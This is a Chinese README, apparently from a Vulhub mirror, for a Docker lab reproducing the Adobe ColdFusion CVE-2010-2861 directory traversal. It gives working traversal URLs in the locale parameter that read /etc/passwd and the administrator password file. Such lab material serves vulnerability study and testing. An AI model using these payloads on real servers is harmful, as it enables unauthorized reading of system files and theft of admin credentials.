aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/coldfusion/CVE-2010-2861/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

26 lines
992 B
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Adobe ColdFusion 文件读取漏洞CVE-2010-2861
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品其运行的CFMLColdFusion Markup Language是针对Web应用的一种程序设计语言。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞可导致未授权的用户读取服务器任意文件。
## 环境搭建
执行如下命令启动Adobe CouldFusion 8.0.1版本服务器:
```
docker compose up -d
```
环境启动可能需要1~5分钟启动后访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`,可以看到初始化页面,输入密码`admin`,开始初始化整个环境。
## 漏洞复现
直接访问`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`,即可读取文件`/etc/passwd`
![](1.png)
读取后台管理员密码`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en`
![](2.png)
Reference in New Issue View Git Blame Copy Permalink